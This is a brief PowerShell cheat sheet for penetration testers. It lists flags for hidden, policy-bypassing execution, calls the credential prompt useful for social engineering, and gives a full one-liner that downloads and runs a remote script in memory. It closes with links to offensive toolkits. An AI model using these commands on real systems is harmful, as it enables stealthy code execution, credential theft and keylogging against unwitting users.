---
title: Powershell Windows (Security-) Administration
categories: [cheatsheets]
tags: [security, windows]
---

# Powershell

1) powershell.exe Parameter:

```
-Exec Bypass    // allows the execution of scripts
-NoP            // NoProfile - keep same/standard environment
-NonI           // Non Interactive Mode -> No Promt, just execution of the commands
-W Hidden       // Hide the Window
-noexit         // Keeps the shell open (good for keyloggers etc)
-Command        // Execute a command
```


2) Use the powershell to get information about the system


```
Get-Hotfix      // checks windows patches
Get-Service     // print all services
Get-Process     // print all processes
Get-Credentials // Nice login field for social engineering
```

3) Load scripts from webserver and execute them (inline and in-memory)
```
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1');
```
**Important:**

-> Never use a unknown code from the internet for a client!


4) Some powershell scripts for pentesters

* https://github.com/cheetz/Easy-P
* https://github.com/PowerShellMafia/PowerSploit
* https://github.com/samratashok/nishang/tree/master/Gather